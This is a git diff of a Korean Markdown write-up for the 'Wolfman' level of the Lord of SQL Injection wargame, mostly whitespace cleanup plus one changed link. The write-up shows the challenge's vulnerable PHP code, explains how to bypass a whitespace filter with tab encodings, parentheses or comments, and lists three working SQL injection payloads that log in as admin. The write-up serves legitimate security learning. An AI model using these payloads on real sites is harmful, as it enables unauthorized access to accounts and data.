--- a/Wargame/Lord of SQL Injection/05. Wolfman.md
+++ b/Wargame/Lord of SQL Injection/05. Wolfman.md
@@ -4,30 +4,30 @@
 공백 없이 쿼리를 작성할 수 있는가?
 
 ## 2. 코드
-    <?php 
-      include "./config.php"; 
-      login_chk(); 
-      dbconnect(); 
+    <?php
+      include "./config.php";
+      login_chk();
+      dbconnect();
 
       if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw]))  
-          exit("No Hack ~_~"); 
+          exit("No Hack ~_~");
 
       if(preg_match('/ /i', $_GET[pw]))
-          exit("No whitespace ~_~"); 
+          exit("No whitespace ~_~");
 
-      $query = "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'"; 
-      
-      echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
-      
-      $result = @mysql_fetch_array(mysql_query($query)); 
-      
+      $query = "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'";
+
+      echo "<hr>query : <strong>{$query}</strong><hr><br>";
+
+      $result = @mysql_fetch_array(mysql_query($query));
+
       if($result['id'])
-          echo "<h2>Hello {$result[id]}</h2>"; 
-      
-      if($result['id'] == 'admin')
-          solve("wolfman"); 
+          echo "<h2>Hello {$result[id]}</h2>";
 
-      highlight_file(__FILE__); 
+      if($result['id'] == 'admin')
+          solve("wolfman");
+
+      highlight_file(__FILE__);
     ?>
 
 ### 1. preg_match()
@@ -58,13 +58,13 @@ pw 파라미터를 통해서만 이 쿼리를 조작할 수 있을 것 같다.
     %09 | %0a | %0b | %0c | %0d
 
     %09 = Horizontal Tab (수평 탭. \t)
-    
+
     %0a = Line Feed (Move Caret right down. \n)
-    
+
     %0b = Vertical Tab (수직 탭. \v)
-    
+
     %0c = Form feed (if you use this in printer, it will change paper to next paper. 다음장으로 바꿈. \f)
-    
+
     %0d = Carriage return (Move Caret start of line where this is. 타자기에서 끝까지 다 쳤을때 왼쪽으로 미는거 \r)
 
 ### 2. 괄호 사용
@@ -78,13 +78,13 @@ pw 파라미터를 통해서만 이 쿼리를 조작할 수 있을 것 같다.
     or id="admin" 과 or/**/id="admin" 은 같은 맥락이다.
 
 ### My Answers :
-    
+
     ?pw='or%09id='admin // 구분 문자 이용
 
     ?pw='or(id)='admin // 괄호 사용 구분
 
     ?pw='or/**/id='admin // 주석 사용
-      
+
 **Lastly, There can be many answers**
 
-**[Go to see other solutions](https://github.com/moreal/TIL/blob/master/Security/WarGame/WriteUp/los.eagle-jump.org/00.%20ReadMe.md)**
+**[Go to see other solutions](https://github.com/moreal/WriteUp/blob/master/Wargame/Lord%20of%20SQL%20Injection/00.%20ReadMe.m)**
